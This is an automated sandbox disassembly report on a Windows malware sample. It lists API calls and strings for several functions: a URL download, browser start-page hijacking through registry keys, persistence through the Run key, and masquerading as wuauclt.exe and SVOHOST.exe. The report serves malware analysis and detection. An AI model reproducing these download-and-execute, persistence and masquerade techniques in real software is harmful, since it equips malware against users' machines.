                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408380
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000), ref: 004083A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$DirectoryDownloadSleepWindows
                                                                            • String ID: HomePage$Software\Microsoft\Internet Explorer\Main$Software\Policies\Microsoft\Internet Explorer\Control Panel$Start Page$http://www.xxx.com/ie.txt$ies.dll$yes
                                                                            • API String ID: 1217617683-1617324073
                                                                            • Opcode ID: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction ID: 23d5ada1644d4a4c0fdc49a889b3002e5e187da7be67f6644f1964e870e1d3b9
                                                                            • Opcode Fuzzy Hash: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction Fuzzy Hash: 9A413E702002099BD700FB65DA46A4E77B8AF84709F50847FB940BB6D3DB7CAE018A6D
                                                                            APIs
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007418F7
                                                                            • RegOpenKeyExA.KERNEL32(80000000,Applications\iexplore.exe\shell\open\command,00000000,00000001,?), ref: 00741911
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0074192B
                                                                            • RegCloseKey.KERNEL32(?), ref: 00741985
                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00741996
                                                                            • ReadFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 007419B6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007419C0
                                                                            Strings
                                                                            • C:\Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 00741968
                                                                            • Applications\iexplore.exe\shell\open\command, xrefs: 0074190B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFile$CreateDirectoryHandleOpenQueryReadValueWindows
                                                                            • String ID: Applications\iexplore.exe\shell\open\command$C:\Program Files\Internet Explorer\IEXPLORE.EXE
                                                                            • API String ID: 418526577-3772566379
                                                                            • Opcode ID: 6382d5f0b092d97e32057f3048904276d8e99775e3dbb19f3df7423156e039d2
                                                                            • Instruction ID: edf26cb5b2fdfd7aca4b543a6d92762bffc3fc4f7e0eafbba8dde198d743a535
                                                                            • Opcode Fuzzy Hash: 6382d5f0b092d97e32057f3048904276d8e99775e3dbb19f3df7423156e039d2
                                                                            • Instruction Fuzzy Hash: EB315CB190029CBFEB11AF94DC95AEE7BBCEB05794F9040A6F504A6190D7385EC48B64

Control-flow Graph

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402914
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402938
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402954
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402975
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040299E
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004029AC
• GetStdHandle.KERNEL32(000000F5), ref: 004029E7
• GetFileType.KERNEL32(?,000000F5), ref: 004029FD
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00402A18
• GetLastError.KERNEL32(000000F5), ref: 00402A30
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
• Instruction ID: c08e0bc1a52ce57edfd428ff71f0c6be874f716b93af5554cff537b7abe3d1e7
• Opcode Fuzzy Hash: 4113a296a6b07ebc5190b62d8c07d533219a22d082d969f70b3c1b6d1517c3ba
• Instruction Fuzzy Hash: 1441A2706007009AE731AF288A0D76375D4FB44754F20CA3FE0D6B66E1EAFD98859B5D

Control-flow Graph

APIs
  • Part of subcall function 00404F84: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404F97
  • Part of subcall function 00402728: GetSystemTime.KERNEL32(?), ref: 00402732
• ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
• ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040681F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: ExecuteShellSystem$DirectoryTime
• String ID: A}vokwcq*`~f$SVOHOST.exe$kucm$lqrs>*)tsr(gra`lvjhf*fin$lqrs>*)tsr(lj``lvapg*fin
• API String ID: 3953870399-2285911871
• Opcode ID: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
• Instruction ID: 0ed2c2afb193c78c9d8b93d9018a26212a72780c50695523a22b01571590cbab
• Opcode Fuzzy Hash: 5a60625d515bbb0749ab80c7592574fde7c09cedb0ef7e96fb97db1a3d50b3f8
• Instruction Fuzzy Hash: B7215171601109ABD701FB95D842A9F77BDDF84708F51813BB901BB2C2DABC9E1086A9

Control-flow Graph

APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000), ref: 0040388D
• WriteFile.KERNEL32(00000000,000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005), ref: 00403893
• GetStdHandle.KERNEL32(000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922), ref: 004038A8
• WriteFile.KERNEL32(00000000,000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 204 at 004024A4,0000001E,?,00000000,?,00403922), ref: 004038AE
• MessageBoxA.USER32(00000000,Runtime error 204 at 004024A4,Error,00000000), ref: 004038CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error 204 at 004024A4
• API String ID: 1570097196-1210366263
• Opcode ID: b68687b8441167e0e7bf8da679501d12e24b0d3a124027dfd45220ab2cdab9ab
• Instruction ID: 73fe0ec3fb90fb3f474716323d8876418e50ff0bdbf46fc0c8a6d106d48d8078
• Opcode Fuzzy Hash: b68687b8441167e0e7bf8da679501d12e24b0d3a124027dfd45220ab2cdab9ab
• Instruction Fuzzy Hash: 89F09662A8434478E73077615D06F56369C5744F16F20C6BFB260745F2C6BC89C4831E
APIs
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00741AA2
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00741AAC
• K32EnumProcesses.KERNEL32(00000000,00001000,00000000), ref: 00741ACF
• FindCloseChangeNotification.KERNEL32(00000000), ref: 00741B23
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00741B90
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00741B98
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00741BA2
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00741BB4
Memory Dump Source
• Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
• Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_740000_sxs.jbxd
Similarity
• API ID: Virtual$Free$Alloc$ChangeCloseEnumFindNotificationProcesses
• String ID:
• API String ID: 3700081247-0
• Opcode ID: 7c549f0e201ddbfeb435f4ae4af981e028cfcc3721ad8a18c754fdd26cb48ad4
• Instruction ID: 8b5f1f6882e4fdfbda3c75d7ebf349de15f0e7b955e36f1e281c4415aa360201
• Opcode Fuzzy Hash: 7c549f0e201ddbfeb435f4ae4af981e028cfcc3721ad8a18c754fdd26cb48ad4
• Instruction Fuzzy Hash: 00412075A00208AFDB20EF95CC84FEEBBB9EF49350F518065F915A7250D7749A81CB64

Control-flow Graph

APIs
• Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
  • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
  • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
  • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
  • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
  • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
Strings
• Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
• wuauclt.exe, xrefs: 00407DFC
• l}+2, xrefs: 00407E36
• Microsoft, xrefs: 00407E11
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
• String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
• API String ID: 1219844470-3788782062
• Opcode ID: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
• Instruction ID: d9744ce1b4bbba914fbef4a0fdf434069bd0e944c21e36a7c6e37f089c0d93f6
• Opcode Fuzzy Hash: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
• Instruction Fuzzy Hash: C321A1B06152046FD701FBA5D95399E7BA8EF81304F5080BBB500B72D2CBB8BE0086A9

Control-flow Graph

APIs
• Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
  • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
  • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
  • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
  • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
  • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
Strings
• Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
• wuauclt.exe, xrefs: 00407DFC
• l}+2, xrefs: 00407E36
• Microsoft, xrefs: 00407E11
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
• String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
• API String ID: 1219844470-3788782062
• Opcode ID: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
• Instruction ID: 3575f48fa22139c18a4af409e614c0b40dd6271191b82a0b2a34aed62443784d
• Opcode Fuzzy Hash: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
• Instruction Fuzzy Hash: 1C1142B0A15104ABD705FB95D95399E77A9EB84304F5084BBB500B72D2DBBCBE0086AD

Control-flow Graph

APIs
• RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004018A9
• LocalFree.KERNEL32(007F2238,00000000,00401952), ref: 004018BB
• VirtualFree.KERNEL32(00000000,00000000,00008000,007F2238,00000000,00401952), ref: 004018DA
• LocalFree.KERNEL32(00000000,00000000,00000000,00008000,007F2238,00000000,00401952), ref: 00401919
• RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401942
• RtlDeleteCriticalSection.NTDLL(0040A5B0), ref: 0040194C
Memory Dump Source
• Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_sxs.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID:
• API String ID: 3782394904-0
• Opcode ID: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
• Instruction ID: 59a79e90b1042c7fa72c1bdd4368158aee1beb707aa836db6f4ae4b0191b2b59
• Opcode Fuzzy Hash: 1e6658f3a1c7c09b26b832841b6dc3e54d0db2190f45ee9201c8f0ac4b0f75cc
• Instruction Fuzzy Hash: 171160B1604340AEE715AB659D92F1337A8B74A708F14843BF200BA6F2D67D98A0D71E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(001B7740,00000000,00408012,?,00000000,00000000,00000000), ref: 00407F70
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00406708: InternetGetConnectedState.WININET(?,00000000), ref: 00406717
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407FD9
                                                                            • l}+2, xrefs: 00407F7F
                                                                            • wuauclt.exe, xrefs: 00407FBF
                                                                            • Microsoft, xrefs: 00407FD4
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407F95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseConnectedDirectoryInternetSleepStateValueWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 3088811538-3788782062
                                                                            • Opcode ID: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction ID: 026fbd7338b316a051164a3f2916be19fdbad90e0342d7335669e4ba070194ba
                                                                            • Opcode Fuzzy Hash: 2bd880a330ccf7098cd0f064fbb41e6f7692dc24caeb265b28b5c7e1db9d23fc
                                                                            • Instruction Fuzzy Hash: 8F112170740204ABE701BAA5D913B5D77A8DB84708F61807FF540BB2D2CFBD9E04966D
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00534348), ref: 005318FC
                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 0053192E
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00001856,00000000,?), ref: 00531981
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Create$ChangeCloseFindMutexNotificationThread
                                                                            • String ID: $CS$HCS
                                                                            • API String ID: 3723544443-672069553
                                                                            • Opcode ID: 44da6da03f1db095d343fef24bdce93df3bd47e21fcd77e076c34890f7da35c3
                                                                            • Instruction ID: c9d8207afee19221d661383ec636829f3ca9a533000a28e35a20a856c4037f4e
                                                                            • Opcode Fuzzy Hash: 44da6da03f1db095d343fef24bdce93df3bd47e21fcd77e076c34890f7da35c3
                                                                            • Instruction Fuzzy Hash: A221C331500A04BBC7255BB2AC4CE7F7F7DFBA9795F10081AF206D2220DB349849EA78
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0053158E
                                                                            • Process32First.KERNEL32(00000000,00000000), ref: 005315A9
                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 005315F1
                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 005315FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 3243318325-0
                                                                            • Opcode ID: c72da45e599b28c7d0edcca666fad09cbb784da37aed8e2f8db903f8ebd3e858
                                                                            • Instruction ID: 159f9d4025681f1ee254c6f8235d1b0752aead8523d0c164bde0ddbe7d7545ec
                                                                            • Opcode Fuzzy Hash: c72da45e599b28c7d0edcca666fad09cbb784da37aed8e2f8db903f8ebd3e858
                                                                            • Instruction Fuzzy Hash: 3621B235900618ABDB219BB5DC49BEEBFB8BF44361F1440A5F905E3180DB749F88DE68
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004383ED
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 00438509
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$FreeProtect
                                                                            • String ID: @O:r
                                                                            • API String ID: 2581862158-1513391029
                                                                            • Opcode ID: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction ID: 1c248bd57497abf13f7211ff5bbec31fcd2e4003a81eef7960cbaa05da7696eb
                                                                            • Opcode Fuzzy Hash: 62998878eee791b55a4525ffa1200409ee62ec3c0713ca06769709f58399dcba
                                                                            • Instruction Fuzzy Hash: D25139322043169FE7258B18CC907E6F7A1EF99314F38506EF9498B781EB79AC42CB54
                                                                            APIs
                                                                              • Part of subcall function 005311B6: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
                                                                            • PostThreadMessageA.USER32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 005314EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocMessagePostThreadVirtual
                                                                            • String ID: xCS$xCS
                                                                            • API String ID: 1881464792-3893400034
                                                                            • Opcode ID: af53d2dbedeae5b118e693cdc33f52ba4f9957edaef15deec4c71326dbc5f689
                                                                            • Instruction ID: 34e7f80f565ddf980a7cb78d34ba227333c473b334a6997c041f1120bed2be15
                                                                            • Opcode Fuzzy Hash: af53d2dbedeae5b118e693cdc33f52ba4f9957edaef15deec4c71326dbc5f689
                                                                            • Instruction Fuzzy Hash: B5114D72901519BACF20ABB19C8DDEF7F6CEF85754F100461FA09D2100EA349A49DBA4
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,0000116C,00001000,00000004), ref: 007000A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2018675684.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_700000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: -
                                                                            • API String ID: 4275171209-2547889144
                                                                            • Opcode ID: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction ID: 4166b81ffa788d98eec51b05f68dab8a27596673f017a6c03852e6622b23dc0e
                                                                            • Opcode Fuzzy Hash: e4a18ab6a6c0e9bdc92e7bbfef9058a5b763e4d299425c6ffac95ad41b1d133a
                                                                            • Instruction Fuzzy Hash: 3A2134716483429FD314CA54CC45F6BB7E4EBD8320F088A2CF9959B3C2D779A909C7A2
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,00000000,?,00402FAB,00406977,00000000,00406C22), ref: 00402F4B
